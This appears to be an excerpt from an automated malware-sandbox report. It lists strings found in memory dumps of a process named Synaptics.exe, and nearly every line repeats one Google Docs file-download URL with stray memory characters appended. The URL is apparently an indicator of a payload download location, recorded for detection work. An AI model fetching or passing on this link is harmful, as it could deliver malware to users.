                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000004.00000002.2396381633.0000000004AEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2401493555.0000000007D5E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPL2
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP_p
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPay
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPu
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR-
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR2s
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRa
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSM
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSN
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSe
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSec-C
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTa
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTr
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUA
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUF
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUM
                              Source: Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVJ
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVd
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX;J
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXI
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXbA
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXs
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYB
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_150xe
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2411893896.000000001287E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaBY
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadate
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb)
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbFQ
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbM
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcati
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceD
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcisco
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddH
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddate7
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddel=
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeCU
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfB
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfa
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfe-in
                              Source: Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadge
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh_
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadha
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhc
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhu5
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiF$
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiM
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadicX
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadig
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadim
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiop
                              Source: Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj-
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjGY
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjJ
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjb
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjd
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjz
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlI#
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlr1
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmA
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmB
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadma
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.0000000005324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadob
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocati
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonb/
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadort=d
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadox
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp%
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp;
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpa
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps=
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154935594.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000004.00000002.2401328312.000000000799E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq$$
